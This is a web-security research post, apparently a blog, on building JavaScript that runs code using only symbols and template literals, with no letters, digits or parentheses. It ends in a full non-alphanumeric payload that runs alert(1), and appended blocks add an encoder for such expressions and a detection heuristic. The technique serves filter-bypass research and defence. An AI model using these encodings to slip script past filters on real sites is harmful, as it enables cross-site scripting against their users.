Executing non-alphanumeric JavaScript without parentheses

I decided to look at non-alphanumeric JavaScript again to see whether it could be executed without parentheses. I gave a presentation on the subject a few years ago (slides). Using similar techniques we were able to hack Uber.

A few things have changed in the browser world since I last looked at it; the interesting features are template literals and the find function on Array objects. Template literals are useful because you can call functions without parentheses, and the find function can be generated using the string "undefined", so the result is much shorter than the original method.

The basics of non-alpha involve using JavaScript objects to generate strings that eventually lead to code execution. For example, +[] creates zero in JavaScript and [][[]] creates undefined. By converting objects such as undefined to a string like this, [[][[]]+[]][+[]], we can reuse those characters and access other objects. If we want to call arbitrary code we need to call the constructor property of functions, e.g. [].find.constructor('alert(1)')().

So the first task is to generate the string "find"; we need to generate numbers in order to get the correct index on the undefined string. Here is how to generate the number 1.

+!+[] // 1

Basically the code creates zero, ! inverts it to true since 0 is falsy in JavaScript, and the + then turns true into 1. Next we need to create the string undefined as described above and reach index 4 by adding these numbers together, producing "f".

[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]] // f

Then we do the same thing to generate the other letters, increasing or decreasing the index.

[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]] // i
[[][[]]+[]][+[]][+!+[]] // n
[[][[]]+[]][+[]][!+[]+!+[]] // d

Now we need to combine the characters and access the find function on an array literal.

[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]] // find function

This gives us a few more characters: the toString value of the find function is function find() { [native code] }, and the important character here is "c". We can use the code above to get the find function, convert it to a string, and then get the relevant index.

[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]] // c

Now we continue using objects (true and false, converted to strings) to get the other characters of "constructor".

[[]+{}][+[]][+!+[]] // o
[[][[]]+[]][+[]][+!+[]] // n
[![]+[]][+[]][!+[]+!+[]+!+[]] // s
[!![]+[]][+[]][+[]] // t
[!![]+[]][+[]][+!+[]] // r
[[][[]]+[]][+[]][+[]] // u
[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]] // c
[!![]+[]][+[]][+[]] // t
[[]+{}][+[]][+!+[]] // o
[!![]+[]][+[]][+!+[]] // r

The Function constructor can now be accessed by getting the constructor property twice on an array literal. Combine the characters above to form "constructor", then use the array literal []['constructor']['constructor'] to reach the Function constructor.

[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]] // Function

Now we need to generate the code to execute, in this case alert(1); true and false can generate "alert". Then we need the parentheses from the [].find function.

[!{}+[]][+[]][+!+[]] // a
[!{}+[]][+[]][!+[]+!+[]] // l
[!{}+[]][+[]][!+[]+!+[]+!+[]+!+[]] // e
[!![]+[]][+[]][+!+[]] // r
[!![]+[]][+[]][+[]] // t
[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]] // (
[+!+[]] // 1 (wrapped in an array literal so it concatenates as the string "1" without needing parentheses)
[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]] // )
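The character-generation steps above, from the number primitives through the find function and the Function constructor to the "alert(1)" string, as an added example that is not code from the original post. It is a small encoder that derives each expression from the source strings the post uses (undefined, false, true, [object Object] and the toString of [].find) and then evaluates the result to confirm it. It takes the first listed source string that contains a character, so a few letters come from a different string than the hand-built versions above (the results are equivalent), and it assumes V8-style Function.prototype.toString. The helper names (num, charExpr, strExpr, evaluate, check) are this example's own.

```javascript
// Added example, not code from the original post: the character-building step of the
// technique written as an encoder, so every expression can be checked by evaluation
// instead of by hand. Assumes V8-style Function.prototype.toString, i.e.
// String([].find) === "function find() { [native code] }".

// Number n as a non-alphanumeric expression: +[] is 0, +!+[] is 1, and
// true+true+... (each true written !+[]) gives larger integers.
function num(n) {
  if (n === 0) return "+[]";
  if (n === 1) return "+!+[]";
  return Array(n).fill("!+[]").join("+");
}

// Strings obtainable from plain objects, with the expression that produces each.
// Order matters: the first string containing a character is used.
const SOURCES = [
  ["undefined",       "[[][[]]+[]][+[]]"],   // [][[]] is undefined; +[] stringifies it
  ["false",           "[![]+[]][+[]]"],
  ["true",            "[!![]+[]][+[]]"],
  ["[object Object]", "[[]+{}][+[]]"],
];

// Expression for one character: index into a source string, or for a digit an
// array literal such as [+!+[]], whose toString is "1" when concatenated.
function charExpr(ch) {
  if (/[0-9]/.test(ch)) return `[${num(Number(ch))}]`;
  for (const [text, expr] of SOURCES) {
    const idx = text.indexOf(ch);
    if (idx !== -1) return `${expr}[${num(idx)}]`;
  }
  throw new Error(`no source string contains ${JSON.stringify(ch)}`);
}

// Expression for a whole string: the character expressions concatenated with +.
// A leading digit would otherwise evaluate to an array, so "[]+" forces a string.
function strExpr(s) {
  if (s === "") return "[]+[]";
  const parts = [...s].map(charExpr);
  if (/[0-9]/.test(s[0])) parts.unshift("[]");
  return parts.join("+");
}

// [].find built from "undefined" alone, then stringified: that string supplies
// "(" and ")" (and a space), which none of the four base strings contain.
const FIND_EXPR = `[][${strExpr("find")}]`;
SOURCES.push([String([].find), `[${FIND_EXPR}+[]][+[]]`]);

// "constructor" twice on an array literal reaches the Function constructor.
const CONSTRUCTOR_EXPR = strExpr("constructor");
const FUNCTION_EXPR = `[][${CONSTRUCTOR_EXPR}][${CONSTRUCTOR_EXPR}]`;

// Evaluate a generated expression in an isolated function scope.
const evaluate = (expr) => Function(`return (${expr})`)();

// Confirms the two properties the technique relies on: the text contains no
// letters, digits or parentheses, and it still evaluates to the intended value.
function check(expr, expected) {
  return !/[a-z0-9()]/i.test(expr) && Object.is(evaluate(expr), expected);
}
```

check(FUNCTION_EXPR, Function) returning true is the whole point of the section: a string made only of [ ] + ! { } that still evaluates to the Function constructor.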

That is the code generated; now we need to execute it. A template literal also calls a function even when the tag is an expression, which allows you to place them next to each other and is very useful for non-alpha code. The Function constructor returns a function, so it actually needs to be called twice to execute the code. For example Function`alert(1)``` is perfectly valid JavaScript. You might think you could simply pass the generated string inside a template literal and execute the Function constructor, but this doesn't quite work, as the code alert`${'ale'+'rt(1)'}` demonstrates. The template literal passes each part of the string as an argument; if you place some text before and after the template expression you will see that two arguments are sent to the called function: the first contains the text before and after the template expression separated by a comma, and the second contains the result of the template literal expression. The following code shows this:

function x(){alert(arguments[0]);alert(arguments[1])}
x`x${'ale'+'rt(1)'}x`
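The argument splitting described above, and the double call through the Function constructor, as an added example that is not from the original post. alert is replaced with a return value so it runs under Node and the results can be checked; capture, splitExample, wrongCall and viaFunction are names chosen for this example.

```javascript
// Added example, not code from the original post: what a tagged template actually
// passes to the tag function, and why Function has to be called twice.

// A tag that simply records what it received: the literal text pieces arrive as an
// array in the first argument, each ${...} result as a further argument.
function capture(strings, ...values) {
  return { strings: [...strings], values };
}

// Equivalent of the post's x`x${'ale'+'rt(1)'}x`: arguments[0] is ["x","x"],
// arguments[1] is "alert(1)".
function splitExample() {
  return capture`x${'ale' + 'rt(1)'}x`;
}

// Why alert`${'ale'+'rt(1)'}` does not work: the first argument is the array
// ["",""] (which alert would display as ","), and the code lands in the second.
function wrongCall() {
  return capture`${'ale' + 'rt(1)'}`;
}

// Function as the tag: arguments[0] (["$","$"]) is stringified to the parameter
// list "$,$" and arguments[1] becomes the body, giving function anonymous($,$){body}.
// A second, empty template call then invokes the function that was built.
function viaFunction(body) {
  const built = Function`$${body}$`;   // first call: construct the function
  return built``;                      // second call: run it
}

// Number of parameters the "$" padding creates on the constructed function.
function paddedParamCount() {
  return Function`$${"return 1"}$`.length;
}
```

Duplicate parameter names such as $,$ are only legal in sloppy-mode functions, which is what the Function constructor produces unless the body opts into strict mode.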

All that is left is to pass our generated Function constructor to a template literal, but instead of the "x" used above we put "$" on either side of the template literal expression. This creates two unused arguments for the function. The final code looks like this:

[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][!+[]+!+[]]+[!{}+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$``` // Function`$${'alert(1)'}$```, which executes alert(1)
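A defender's counterpart, added here and not part of the original post: a triage heuristic for spotting scripts built this way, for example in CSP violation reports, request logs or a WAF's bypass review. The thresholds and the idiom list are this example's own assumptions, tuned only against the constructed samples inside the block; it is a first-pass filter for manual review, not a parser or a tested detection rule.

```javascript
// Added example, not code from the original post: a triage heuristic for
// non-alphanumeric JavaScript of the kind built above. Thresholds and idiom
// patterns are assumptions chosen for this example; treat hits as candidates.

// The characters the technique is assembled from.
const TOOLKIT = /[\[\]!+{}`$]/g;

// Fraction of non-whitespace characters that come from the toolkit.
function nonAlphaRatio(src) {
  const compact = src.replace(/\s+/g, "");
  if (compact.length === 0) return 0;
  const hits = (compact.match(TOOLKIT) || []).length;
  return hits / compact.length;
}

// Idioms that recur in payloads of this style:
//   [[][[]]+[]]          undefined as a string
//   [![]+[]] / [!![]+[]] false / true as a string
//   ][+[]]               index 0 of a one-element array, pulling the string out
//   ]`                   a tagged template applied to a bracketed expression
const IDIOMS = [
  /\[\[\]\[\[\]\]\+\[\]\]/,
  /\[!!?\[\]\+\[\]\]/,
  /\]\[\+\[\]\]/,
  /\]`/,
];

// True when a chunk is long, almost entirely toolkit characters, and uses at
// least two of the idioms. Short fragments are ignored to limit false positives
// (ordinary code contains "[]" and "!" too).
function looksLikeNonAlphaJs(src, { minLength = 40, minRatio = 0.9, minIdioms = 2 } = {}) {
  const compact = src.replace(/\s+/g, "");
  if (compact.length < minLength) return false;
  const idiomHits = IDIOMS.filter((re) => re.test(compact)).length;
  return nonAlphaRatio(compact) >= minRatio && idiomHits >= minIdioms;
}

// Constructed samples: the "find" expression from the post, and ordinary code.
const SAMPLE_NON_ALPHA =
  "[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]" +
  "+[[][[]]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]";
const SAMPLE_NORMAL = "const ids = items.filter(x => x.enabled).map(x => x.id);";

// Summary per sample, the shape a log-review script would emit.
function triage(samples) {
  return samples.map((s) => ({
    ratio: Number(nonAlphaRatio(s).toFixed(2)),
    flagged: looksLikeNonAlphaJs(s),
  }));
}
```

The ratio alone is not enough: minified code with many array accesses can score high on a short window, which is why the idiom count and a minimum length are combined with it.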
